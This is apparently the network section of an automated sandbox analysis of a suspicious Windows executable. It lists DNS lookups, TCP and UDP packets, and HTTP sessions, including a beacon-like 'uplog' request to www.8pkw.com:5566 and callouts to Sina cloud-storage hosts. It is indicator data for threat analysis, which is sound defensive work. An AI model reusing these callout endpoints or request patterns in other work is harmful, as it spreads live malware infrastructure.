                                                                                Dec 5, 2024 14:27:29.351711035 CET805008627.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:31.102735996 CET805008627.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:31.107212067 CET5008780192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:31.107217073 CET5008680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:31.227243900 CET805008727.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:31.227488041 CET5008780192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:31.227541924 CET5008780192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:31.347271919 CET805008727.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:32.978173018 CET805008727.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:32.984870911 CET5008780192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:33.001848936 CET5008880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:33.006149054 CET5008980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:33.006164074 CET5009080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:33.121627092 CET8050088114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:33.122025967 CET5008880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:33.126008034 CET5008880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:33.126045942 CET8050089182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:33.126060009 CET8050090119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:33.129956007 CET5008980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:33.129971981 CET5009080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:33.130351067 CET5008980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:33.133829117 CET5009080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:33.245721102 CET8050088114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:33.251524925 CET8050089182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:33.253549099 CET8050090119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:34.363368988 CET8050090119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:34.363435030 CET5009080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:34.363574028 CET8050090119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:34.363641977 CET5009080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:34.364422083 CET5009080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:34.369611979 CET5009180192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:34.484141111 CET8050090119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:34.489411116 CET805009127.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:34.489486933 CET5009180192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:34.489578009 CET5009180192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:34.609447956 CET805009127.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:35.257442951 CET8050089182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:35.257612944 CET8050089182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:35.259923935 CET5008980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:35.259923935 CET5008980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:35.379744053 CET8050089182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:46.901498079 CET8050082114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:46.901575089 CET5008280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:47.043818951 CET5008280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:47.163933992 CET8050082114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:55.026515961 CET8050088114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:55.026580095 CET5008880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:55.026735067 CET5008880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:55.146410942 CET8050088114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:56.385965109 CET805009127.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:56.386025906 CET5009180192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:56.386092901 CET5009180192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:56.386531115 CET5009280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:56.505877972 CET805009127.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:56.506267071 CET805009227.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:56.506345987 CET5009280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:56.506449938 CET5009280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:56.626339912 CET805009227.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:58.260540009 CET805009227.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:58.265866995 CET5009280192.168.2.527.221.16.179

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 5, 2024 14:25:08.844228029 CET5124153192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:09.713490963 CET53512411.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:11.000616074 CET5356953192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:11.000616074 CET5053853192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:11.002671957 CET6256053192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:11.003994942 CET5247653192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:11.005053043 CET6213053192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:11.155478001 CET53524761.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:11.675436020 CET53505381.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:11.881963968 CET53625601.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:11.972735882 CET53535691.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:12.737009048 CET5786553192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:12.759824038 CET5983953192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:13.648283005 CET53598391.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:13.723079920 CET5786553192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:14.310357094 CET53578651.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:14.310375929 CET53578651.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:26.504998922 CET6126553192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:27.504304886 CET6126553192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:28.519720078 CET6126553192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:28.557156086 CET53612651.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:28.557267904 CET53612651.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:28.661678076 CET53612651.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:41.681833029 CET5651053192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:42.676470995 CET5651053192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:25:43.004333019 CET53565101.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:25:43.004358053 CET53565101.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:26:19.135962963 CET6249653192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:26:19.276137114 CET53624961.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:26:26.975692987 CET5947253192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:26:27.114407063 CET53594721.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:26:50.392587900 CET5065353192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:26:50.800753117 CET53506531.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:26:56.062326908 CET5119053192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:26:56.464216948 CET53511901.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:27:27.951493979 CET5543753192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:27:28.957143068 CET5543753192.168.2.51.1.1.1
                                                                                Dec 5, 2024 14:27:29.105617046 CET53554371.1.1.1192.168.2.5
                                                                                Dec 5, 2024 14:27:29.105643988 CET53554371.1.1.1192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 5, 2024 14:25:08.844228029 CET192.168.2.51.1.1.10x61a0Standard query (0)www.8pkw.comA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.000616074 CET192.168.2.51.1.1.10xa59dStandard query (0)www.sina.com.cnA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.000616074 CET192.168.2.51.1.1.10x3101Standard query (0)www.sogou.comA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.002671957 CET192.168.2.51.1.1.10x5bb3Standard query (0)www.so.comA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.003994942 CET192.168.2.51.1.1.10xd037Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.005053043 CET192.168.2.51.1.1.10x923bStandard query (0)www.iqiyi.comA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:12.737009048 CET192.168.2.51.1.1.10xa419Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:12.759824038 CET192.168.2.51.1.1.10x6f3Standard query (0)shoufeifz.qijianfz.comA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:13.723079920 CET192.168.2.51.1.1.10xa419Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:26.504998922 CET192.168.2.51.1.1.10xd753Standard query (0)sinastorage.comA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:27.504304886 CET192.168.2.51.1.1.10xd753Standard query (0)sinastorage.comA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:28.519720078 CET192.168.2.51.1.1.10xd753Standard query (0)sinastorage.comA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:41.681833029 CET192.168.2.51.1.1.10xaad1Standard query (0)sinastorage.cnA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:42.676470995 CET192.168.2.51.1.1.10xaad1Standard query (0)sinastorage.cnA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:26:19.135962963 CET192.168.2.51.1.1.10xc60dStandard query (0)sinastorage.cnA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:26:26.975692987 CET192.168.2.51.1.1.10x38c5Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:26:50.392587900 CET192.168.2.51.1.1.10x14f8Standard query (0)sinastorage.comA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:26:56.062326908 CET192.168.2.51.1.1.10xdf1cStandard query (0)sinastorage.cnA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:27:27.951493979 CET192.168.2.51.1.1.10x63ddStandard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:27:28.957143068 CET192.168.2.51.1.1.10x63ddStandard query (0)sinacloud.netA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 5, 2024 14:25:09.713490963 CET1.1.1.1192.168.2.50x61a0No error (0)www.8pkw.com43.154.56.182A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.155478001 CET1.1.1.1192.168.2.50xd037No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.155478001 CET1.1.1.1192.168.2.50xd037No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.155478001 CET1.1.1.1192.168.2.50xd037No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.155478001 CET1.1.1.1192.168.2.50xd037No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.257349014 CET1.1.1.1192.168.2.50x923bNo error (0)www.iqiyi.comwww.iqiyiweb.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.675436020 CET1.1.1.1192.168.2.50x3101No error (0)www.sogou.com43.153.236.147A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.881963968 CET1.1.1.1192.168.2.50x5bb3No error (0)www.so.comso.seos-lb.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.881963968 CET1.1.1.1192.168.2.50x5bb3No error (0)so.seos-lb.com104.192.110.226A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.972735882 CET1.1.1.1192.168.2.50xa59dNo error (0)www.sina.com.cnspool.grid.sinaedge.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.972735882 CET1.1.1.1192.168.2.50xa59dNo error (0)spool.grid.sinaedge.comww1.sinaimg.cn.w.alikunlun.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.972735882 CET1.1.1.1192.168.2.50xa59dNo error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.233A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.972735882 CET1.1.1.1192.168.2.50xa59dNo error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.232A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.972735882 CET1.1.1.1192.168.2.50xa59dNo error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.230A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.972735882 CET1.1.1.1192.168.2.50xa59dNo error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.231A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.972735882 CET1.1.1.1192.168.2.50xa59dNo error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.228A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.972735882 CET1.1.1.1192.168.2.50xa59dNo error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.229A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.972735882 CET1.1.1.1192.168.2.50xa59dNo error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.235A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:11.972735882 CET1.1.1.1192.168.2.50xa59dNo error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.234A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:13.648283005 CET1.1.1.1192.168.2.50x6f3No error (0)shoufeifz.qijianfz.com119.28.131.242A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:14.310357094 CET1.1.1.1192.168.2.50xa419No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:14.310357094 CET1.1.1.1192.168.2.50xa419No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:14.310375929 CET1.1.1.1192.168.2.50xa419No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:14.310375929 CET1.1.1.1192.168.2.50xa419No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:28.557156086 CET1.1.1.1192.168.2.50xd753No error (0)sinastorage.com123.126.45.208A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:28.557267904 CET1.1.1.1192.168.2.50xd753No error (0)sinastorage.com123.126.45.208A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:28.661678076 CET1.1.1.1192.168.2.50xd753No error (0)sinastorage.com123.126.45.208A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:43.004333019 CET1.1.1.1192.168.2.50xaad1No error (0)sinastorage.cn183.60.95.221A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:25:43.004358053 CET1.1.1.1192.168.2.50xaad1No error (0)sinastorage.cn183.60.95.221A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:26:19.276137114 CET1.1.1.1192.168.2.50xc60dNo error (0)sinastorage.cn183.60.95.221A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:26:27.114407063 CET1.1.1.1192.168.2.50x38c5No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:26:27.114407063 CET1.1.1.1192.168.2.50x38c5No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:26:50.800753117 CET1.1.1.1192.168.2.50x14f8No error (0)sinastorage.com123.126.45.208A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:26:56.464216948 CET1.1.1.1192.168.2.50xdf1cNo error (0)sinastorage.cn183.60.95.221A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:27:29.105617046 CET1.1.1.1192.168.2.50x63ddNo error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:27:29.105617046 CET1.1.1.1192.168.2.50x63ddNo error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:27:29.105643988 CET1.1.1.1192.168.2.50x63ddNo error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                Dec 5, 2024 14:27:29.105643988 CET1.1.1.1192.168.2.50x63ddNo error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • www.8pkw.com:5566
                                                                                • www.baidu.com
                                                                                • www.sogou.com
                                                                                • www.so.com
                                                                                • www.sina.com.cn
                                                                                • shoufeifz.qijianfz.com
                                                                                • sinacloud.net
                                                                                • 182.254.116.116
                                                                                • 114.114.114.114
                                                                                • 119.29.29.29
                                                                                • sinastorage.com
                                                                                • sinastorage.cn

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.54970643.154.56.18255665448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:10.058543921 CET289OUTGET /kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&x=91317019281 HTTP/1.1
                                                                                Accept: */*
                                                                                User-Agent: Mozilla/4.0 (compatible; MSiE 6.0; Windows NT 5.1;)
                                                                                Accept-Language: en-ch
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: www.8pkw.com:5566
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:11.643975019 CET382INHTTP/1.1 200 OK
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Encoding: gzip
                                                                                Vary: Accept-Encoding
                                                                                Server: Microsoft-IIS/8.5
                                                                                X-Powered-By: PHP/5.2.17
                                                                                X-Powered-By: ASP.NET
                                                                                Date: Thu, 05 Dec 2024 13:25:11 GMT
                                                                                Content-Length: 143
                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 de 36 cd 2c 6b b3 9d 47 3f f3 68 97 fe 3f 6f db d5 a3 bb 77 e9 37 f9 df ff 03 32 72 70 8a 1f 00 00 00
                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"6,kG?h?ow72rp


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.549708103.235.46.96805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:11.281021118 CET219OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: www.baidu.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:12.907692909 CET1236INHTTP/1.1 200 OK
                                                                                Bdpagetype: 1
                                                                                Bdqid: 0xad45e32b005f54a8
                                                                                Connection: keep-alive
                                                                                Content-Encoding: gzip
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Date: Thu, 05 Dec 2024 13:25:12 GMT
                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                Server: BWS/1.1
                                                                                Set-Cookie: BAIDUID=F19AD5976F67B0CB8FFE731804781311:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                Set-Cookie: BIDUPSID=F19AD5976F67B0CB8FFE731804781311; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                Set-Cookie: PSTM=1733405112; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                Set-Cookie: BAIDUID=F19AD5976F67B0CBE32EDBCE12E8263E:FG=1; max-age=31536000; expires=Fri, 05-Dec-25 13:25:12 GMT; domain=.baidu.com; path=/; version=1; comment=bd
                                                                                Set-Cookie: BDSVRTM=36; path=/
                                                                                Set-Cookie: BD_HOME=1; path=/
                                                                                Traceid: 1733405112073296897012485635315783914664
                                                                                X-Ua-Compatible: IE=Edge,chrome=1
                                                                                X-Xss-Protection: 1;mode=block
                                                                                Transfer-Encoding: chunked
                                                                                Data Raw: 32 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 69 73 5c 4b 76 18 f8 9d bf a2 04 44 8b 64 17 6a df 0b cd 27 11 20 48 82 0b 08 12 dc f5 7a 10 b7 6e dd 5b 55 44 6d a8 5b 55 d8 cc 08 c9 9e b6 ec f1 68 0b 85 ed 18 4b e3 19 29 c2 13 33 11 33 2d 39 46 1e 6b 24 4b fa 31 ee f7 ba fb d3 fc 85 39 e7 e4 72 73 bb b5 80 a0 64 47 b8 d1 ef bd aa 5b 79 33 4f 9e 3c 79 f2 ec f9 a3 5f 79 f0 62 f7 f5 87 c3 bd 54 77 3a e8 7f f3 a3 5f c9 64 8e 5e df 7f fd e6 28 f5 e2 69 26 f3 cd 8f d8 d3 6e e0 b5 bf f9 d1 20 98 7a d0 6c 3a ce 04 a7 b3 de fc de c6 ee 68 38 0d 86
                                                                                Data Ascii: 200is\KvDdj' Hzn[UDm[UhK)33-9Fk$K19rsdG[y3O<y_ybTw:_d^(i&n zl:h8
                                                                                Dec 5, 2024 14:25:12.907819033 CET1236INData Raw: d3 cc eb 8b 71 b0 91 f2 d9 b7 7b 1b d3 e0 7c 9a c3 17 b7 fd ae 37 89 82 e9 bd d9 34 cc d4 37 1c 3d bc cf bc b9 9f d9 1d 0d c6 de b4 d7 ea ab 9d ec ef dd 0b da 9d 60 cb ef 4e 46 83 e0 5e 41 bc 2d 47 f1 fa 67 de 45 b4 91 1a 7a f0 f3 c6 24 08 83 c9
                                                                                Data Ascii: q{|747=`NF^A-GgEz$$f?&|!Oo"O{???//[?gw?~
                                                                                Dec 5, 2024 14:25:12.907833099 CET1236INData Raw: f5 19 84 4a 37 2a 9e 4a 38 8e 4e bb 6c 86 c0 f0 1c 8b 7d d6 ed 4d 83 0c 90 a2 1f 00 8f 38 9b 78 e3 6d 63 5b 7f 4e 04 29 05 f8 e6 db ab 00 e8 db e6 bb 87 3e 73 ac d6 00 ab 88 59 d8 7c a9 fc 36 f0 0b 38 71 bd 3e 20 a7 d7 19 36 07 c0 36 fa c1 82 fe
                                                                                Data Ascii: J7*J8Nl}M8xmc[N)>sY|68q> 66q\q@Uv#$oAqgn9$pjA.$Tb,ALl73$q*+Lk ZGjOH#+ m%lO%`7 8%OdJa#AQY
                                                                                Dec 5, 2024 14:25:12.907947063 CET1236INData Raw: 26 34 87 45 0b b8 d2 1c 52 59 30 47 71 47 06 99 9a b7 16 53 2b e0 1a 66 ce de ea f6 d0 4c 78 41 af 09 23 08 9b 8a 32 91 62 b1 b8 1a 20 64 4a d1 66 bf da 7b 2d 26 92 da f6 af 15 46 56 6d 9b a6 f9 12 79 b7 4b be 14 2b d4 28 34 2a f7 4b db dc 3c 00
                                                                                Data Ascii: &4ERY0GqGS+fLxA#2b dJf{-&FVmyK+(4*K<2py#$Bea\%-gucM]wuL~rfvJ|+W9'd0&a\>Pzuahy6Hzf )'0!Y5GPRkRNhD.?3VkM:-
                                                                                Dec 5, 2024 14:25:12.908004045 CET896INData Raw: 9d 42 36 5f df c2 7f dd 4d 84 10 06 3e e6 9e ef 84 a9 d2 c0 ac 8d e6 df e6 e6 7d 5d 39 51 65 50 5c 73 b6 72 35 14 26 ec 93 c0 dc 3a aa f8 a1 b8 1d 61 8e 0e 59 56 d0 63 91 6d 7f 3c e0 93 50 27 e7 c8 65 e7 c5 94 ce a6 6a 8a d9 b7 6f 0b 1d 15 19 58
                                                                                Data Ascii: B6_M>}]9QeP\sr5&:aYVcm<P'ejoXsKqqM&[w!$q,R,m]F7?g'b.B%`_l|Cjl4ZVkv{jO^oCnna[ne[N:m[-oM[84xiw+v)
                                                                                Dec 5, 2024 14:25:12.908018112 CET1236INData Raw: 59 80 95 78 ee e2 93 98 a1 fc ae cd c3 44 fa 82 10 c3 02 c6 07 c1 10 44 2f 52 b1 60 63 72 22 b5 e5 25 2d f4 a4 5c a6 68 18 96 e1 c4 4d 99 a8 74 c8 3d 2d 2d a1 f1 d2 d7 1b 68 b8 d0 84 4e fc d1 92 4b 89 91 a9 ce 6f 65 eb c4 d9 7b 14 7e 13 67 9a b0
                                                                                Data Ascii: YxDD/R`cr"%-\hMt=--hNKoe{~g[S'`B0>@.!Gp[gL[B$baw7z@e'N|~_0+\{.+FMH"m@$U)N@[0aP0({Kc@'JqB_np}W
                                                                                Dec 5, 2024 14:25:12.908030987 CET1236INData Raw: a3 d4 ec df fe 3e 98 f9 f1 a7 ed 68 e2 53 12 f6 ea 3a 1b be 46 f9 d7 d4 b5 df 0e 03 bf 55 87 f4 8a 6c 30 9a de be 7b c3 1d fe da 26 c4 89 f4 ce 41 1f c4 c9 79 d3 3b b7 83 41 2b 80 7c c0 76 06 cb c9 a1 4b f0 f6 dd ad 2f 99 40 e8 e5 41 89 29 d7 bd
                                                                                Data Ascii: >hS:FUl0{&Ay;A+|vK/@A)XQrTr7zBR>(jv:UNfVvRZhLT;z0#}2dYa^vSk9\b`gcDSe&w^rin/hL@9ExxDBh9VL
                                                                                Dec 5, 2024 14:25:12.908042908 CET1236INData Raw: 61 14 62 2d 90 2f c1 7f cc 1e 00 e7 6a 30 18 6b e4 e6 1d 66 31 71 6e b2 a2 e2 49 bd 61 17 6a 26 4d 19 df 50 4a d1 d8 fc d5 99 82 b8 0d 69 02 c8 9b c1 b1 28 53 6b b8 ec 4a 2e 78 6e 2b c3 8f 2a 0b a7 df 14 56 05 e4 6d 18 1e 50 6c 12 06 05 2d e4 8a
                                                                                Data Ascii: ab-/j0kf1qnIaj&MPJi(SkJ.xn+*VmPl-.vei+UTVJLG.f%jI""(e0. HXs`_pLIK3NT/z-ts'7[s,ZTptP+fH`UjZDB$xXu
                                                                                Dec 5, 2024 14:25:12.908759117 CET1236INData Raw: bb 2b 39 3d 86 59 b0 2a f1 fc f3 db 0e 0d 41 9b 2b df e9 71 ed 38 d6 43 72 c1 1e 39 14 9b a3 b1 89 31 15 d1 0e 30 44 56 89 25 21 dc a6 4b 32 f8 27 eb b1 42 43 02 6e 68 ca 56 16 ac 9b 5c 29 d4 b7 38 6e 32 21 8c 5b 16 2b 78 f0 6d c3 b4 53 aa 16 4f
                                                                                Data Ascii: +9=Y*A+q8Cr910DV%!K2'BCnhV\)8n2![+xmSOg\Ef}e0Ad-|Rl2lh3mM^ak3x(/:/XqYEBk6_aC59'{,gNTHR/ow*-y~2e~+`v-
